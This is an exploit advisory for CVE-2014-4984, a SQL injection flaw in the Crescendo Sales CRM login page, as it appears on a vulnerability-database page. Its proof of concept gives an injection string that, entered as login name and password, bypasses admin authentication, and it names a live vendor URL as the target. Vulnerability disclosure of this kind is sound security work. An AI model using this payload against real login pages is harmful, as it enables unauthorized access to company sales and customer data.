Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Crescendo - Sales CRM Authentication Bypass Vulnerability

🗓️ 11 Aug 2014 00:00:00Reported by Monendra SahuType 
zdt
 zdt🔗 0day.today👁 48 Views

Crescendo - Sales CRM Authentication Bypass Vulnerability, SQL Injection, Admin Panel Acces

Related
Code
ReporterTitlePublishedViews
Family
CVE		CVE-2014-4984
10 Jan 202012:18
cve
Cvelist		CVE-2014-4984
10 Jan 202012:18
cvelist
EUVD		EUVD-2014-4899
7 Oct 202500:30
euvd
NVD		CVE-2014-4984
10 Jan 202013:15
nvd
Packet Storm		Crescendo - Sales CRM SQL Injection
6 Aug 201400:00
packetstorm
Prion		Sql injection
10 Jan 202013:15
prion
Positive Technologies		PT-2020-7693 · Unknown · Déjà Vu Crescendo Sales Crm
10 Jan 202000:00
ptsecurity
RedhatCVE		CVE-2014-4984
22 May 202513:35
redhatcve
#################################################
Crescendo - Sales CRM Authentication Bypass Vulnerability
#################################################
 
# Exploit Title: Crescendo - Sales CRM Authentication Bypass Vulnerability (Sql Injection)
# Google Dork: N/A
# Date: July 15 , 2014
# Exploit Author: Monendra Sahu ( [email protected] )
# Vendor Homepage: http://dejavuprotech.com/crecendo.php
# Tested on:Windows
# Browser Used : Google Chrome 35
# CVE: CVE-2014-4984

Vendor Information:
 
"Déjà Vu has introduced Crescendo – Sales CRM. Targeted towards Small & Medium Enterprises, Crescendo is a low cost 

hosted application. Crescendo is instrumental in streamlining the sales processes like lead generation, lead tracking, lead 

management, account management and keeps top management informed about the sales pipeline. With user friendly 

interface, Crescendo comes with various MIS reports represented in tabular as well as graphical format. With the help of 

Crescendo companies can take better, faster and informed decisions. 

Crescendo - Sales CRM offers following modules:
Leads Management
Accounts Management
Contacts Management
Sales Forecasting
Pipeline Management
Teams Management
Targets Managements
Interactive Dashboards
Graphical & MIS Reports

Technologies employed for development of Crescendo - Sales CRM: 
Front End: Asp.Net, Vb.Net
Database: MSSQL Server."
 
 
#################################################
 Issue: SQL Injection, Authentication Bypass
 
Risk level: High
 
=> The remote attacker has the possibility to execute arbitrary SQL Code.
 
=> The remote attacker is able to bypass the Admin authentication.
 
Vulnerable Url : www.site.com/login.aspx
 
-------------------------------------
 
Exploit / Proof Of Concept:
 
Perform a login with the following data:

URL: http://www.crescendocrm.com/login.aspx


Login Name:1'or's'='s
Password:1'or's'='s

You will be able to successfully login into admin panel 
 
-------------------------------------
 
#################################################

#  0day.today [2018-04-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Aug 2014 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.03503
crescendosales crmauthentication bypasssql injectionadmin panelremote attackermis reportsdatabaseasp.netvb.netmssql serverloginproof of concept
48